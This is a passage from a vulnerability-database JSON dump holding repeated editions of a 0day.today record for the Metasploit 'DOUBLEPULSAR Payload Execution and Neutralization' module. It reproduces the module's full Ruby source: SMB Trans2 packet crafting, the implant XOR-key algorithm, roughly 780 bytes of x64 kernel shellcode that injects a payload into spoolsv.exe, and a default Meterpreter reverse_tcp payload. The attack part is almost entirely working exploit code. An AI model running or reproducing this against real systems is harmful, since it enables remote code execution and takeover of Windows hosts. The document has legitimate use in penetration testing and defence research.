\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-11] #"}, "lastseen": "2021-10-11T00:23:49", "differentElements": ["sourceData"], "edition": 41}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "461e604cce0772d7a8fcaf42e274174a", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-12T10:30:51", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96706", "SMNTC-96707", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T10:30:51", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-12T10:30:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-12] #"}, "lastseen": "2021-10-12T10:30:51", "differentElements": ["sourceData"], "edition": 42}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "213e9afa3c60846143f9a4a6709b3375", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-12T22:41:50", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", 